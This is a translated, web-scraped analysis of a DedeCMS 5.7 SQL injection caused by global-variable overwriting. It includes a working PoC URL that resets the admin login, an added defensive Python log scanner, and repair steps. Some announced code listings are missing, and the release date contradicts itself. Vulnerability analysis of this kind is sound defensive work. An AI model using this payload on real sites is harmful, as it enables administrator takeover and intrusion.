Dedecms latest injection vulnerability analysis and repair

Source: Internet
Author: User

Recently I saw the article "Exploitation of an injection vulnerability in the latest dedecms version"; the vulnerability's PoC and analysis have also been published on the Internet. However, during my own testing I found that the vulnerability could not be reproduced, because exploiting it requires certain prerequisites that the original analysis does not describe. Below I summarize my analysis process and the conditions necessary to trigger the vulnerability.

I. Vulnerability tracking

Released on: July 15, June 7, 2013

Vulnerability description:

DedeCMS is a website application system building platform and a powerful website content management system. Based on the PHP + MySQL technical architecture, fully open-source and powerful and stable technical architecture, can be used to build a complex system of enterprise information portals or e-commerce website platforms, it can also be used to manage simple content publishing websites. Whether it is a business resource portal or an entertainment information portal, it is a good helper for you to manage websites.

The root cause of the vulnerability is that dedesql.class.php does not initialize the two global variables $GLOBALS['arrs1'] and $GLOBALS['arrs2'], which allows any global variable to be overwritten.

Hazards: Because dedecms is widely used, this vulnerability is easy to exploit and highly harmful. It can be used remotely to obtain the management backend and then, via getshell, to take direct control of the system.

Trigger condition: make sure php_mysql.dll is not enabled in php.ini.

Affected versions: DedeCMS 5.7

II. Vulnerability principles

First, let's talk about dedecms's unsafe parameter-handling mechanism. Look at line 79 of /include/common.inc.php:

    // for each GPC array, copy every name/value pair into a global variable of that name
    foreach(Array('_GET', '_POST', '_COOKIE') as $_request)
    {
        foreach($$_request as $_k => $_v)
        {
            if($_k == 'varname') ${$_k} = $_v;
            else ${$_k} = _RunMagicQuotes($_v);
        }
    }

This is the root of all evil: essentially every vulnerability discovered in dede starts here. After the program extracts each name/value pair from the GPC arrays, it only runs $_v through simple addslashes processing and then assigns it directly to ${$_k}, which amounts to a global variable overwrite mechanism. The original intention was to make development convenient, but it creates serious security problems. After so many years of upgrades PHP has finally fixed the register_globals problem, yet the dede code makes PHP's efforts pointless.

Next we will return to the vulnerability.

First, look at lines 589-600 of /include/dedesql.class.php.

Before this code executes, the program never initializes the arrays $arrs1 and $arrs2. Combined with dede's insecure parameter handling, this code can be used to overwrite any global variable; in this vulnerability, we use it to control the value of $GLOBALS['cfg_dbprefix'].

Next, let's look at how $GLOBALS['cfg_dbprefix'] is used.

In the SetQuery function of /include/dedesql.class.php (line 3), the code is as follows:

Because $GLOBALS['cfg_dbprefix'] is controllable, $prefix is also controllable, and this is where the SQL injection occurs.

The following walks through how the entire vulnerability is triggered, using the public PoC from the Internet:

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

First, look at this if judgment: if the mysqli extension is enabled, dedesqli.class.php is included instead. The vulnerable code lives in dedesql.class.php, so the mysqli extension must be disabled for the vulnerability to be exploitable.

Execution then enters the dedesql.class.php code.

Here the arrs1 and arrs2 arrays supplied in the request have never been initialized, so $v1 and $v2 are assembled as strings, one character per submitted numeric value.

So here $GLOBALS['cfg_dbprefix'] is overwritten with:

admin` SET `userid`='test', `pwd`='f297a57a5a743894a0e4' where id=1 #

Continuing to trace execution, follow the ExecuteNoneQuery2 function and then SetQuery.

Because $GLOBALS['cfg_dbprefix'] is controllable, the injection happens here. Look at the value of $sql:

Because the ExecuteNoneQuery2 function does not pass the query through the mysql-ids filter, it can be used for the injection. After the update succeeds, the backend account is test and the password is admin.
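As an added example (not part of the original analysis or of DedeCMS), a small Python log scanner that decodes the arrs1[]/arrs2[] character-code encoding the PoC relies on and reports which global each request would overwrite; the access-log lines, the PROTECTED_PREFIXES list and the shortened arrs2 value are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Globals that must never be writable from a request. Assumption for this
# example: "cfg_" covers DedeCMS configuration globals such as cfg_dbprefix;
# the remaining entries are PHP superglobal names.
PROTECTED_PREFIXES = ("cfg_", "GLOBALS", "_GET", "_POST", "_COOKIE", "_SERVER")

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (not from any real server). Line 2 sends
# arrs1[] = "cfg_dbprefix" and a shortened arrs2[] = "admin` #" as char codes.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jul/2013:10:01:02 +0800] "GET /plus/download.php?open=1&id=3 HTTP/1.1" 200 512
203.0.113.9 - - [15/Jul/2013:10:01:07 +0800] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=109&arrs2%5B%5D=105&arrs2%5B%5D=110&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=35 HTTP/1.1" 200 512
"""

def decode_char_array(values):
    """Rebuild the string dedesql.class.php assembles from decimal character
    codes (arrs1[]=99&arrs1[]=102... -> "cf..."); None if any code is not numeric."""
    if not all(v.isdigit() for v in values):
        return None
    return "".join(chr(int(v) % 256) for v in values)  # PHP chr() wraps at 256

def analyse_request(url):
    """Return (global_name, assigned_value) for a request carrying the
    arrs1/arrs2 encoding, or None when the query does not use it."""
    qs = parse_qs(urlsplit(url).query)  # also decodes %5B%5D back to []
    codes1 = qs.get("arrs1[]") or qs.get("arrs1")
    if not codes1:
        return None
    codes2 = qs.get("arrs2[]") or qs.get("arrs2") or []
    return decode_char_array(codes1), decode_char_array(codes2)

def scan_log(text):
    """Return (line_no, global_name, value, is_protected) for every request
    that would write a global through arrs1/arrs2; is_protected flags names
    such as cfg_dbprefix, the one the PoC on this page overwrites."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = analyse_request(m.group(1))
        if decoded is None or decoded[0] is None:
            continue
        name, value = decoded
        hits.append((n, name, value, name.startswith(PROTECTED_PREFIXES)))
    return hits
```

Feed the contents of a real access log to scan_log(); any hit is worth investigating even when is_protected is False, since the mechanism described above lets a request write any global, not only cfg_dbprefix.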

III. Vulnerability verification

PoC: the request given in section II above.


Verification:

IV. Vulnerability repair

0x01. Modify php.ini to enable the php_mysqli.dll extension.

0x02. Modify the code in /include/dedesql.class.php as follows:

    require_once(DEDEINC.'/common.func.php');

    // include the database class
    if($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init"))
    {
        //echo $GLOBALS['cfg_mysql_type'];
        //exit;
        require_once(DEDEINC.'/dedesqli.class.php');
    } else {
        require_once(DEDEINC.'/dedesql.class.php');
    }

    //require_once(DEDEINC.'/common.func.php');
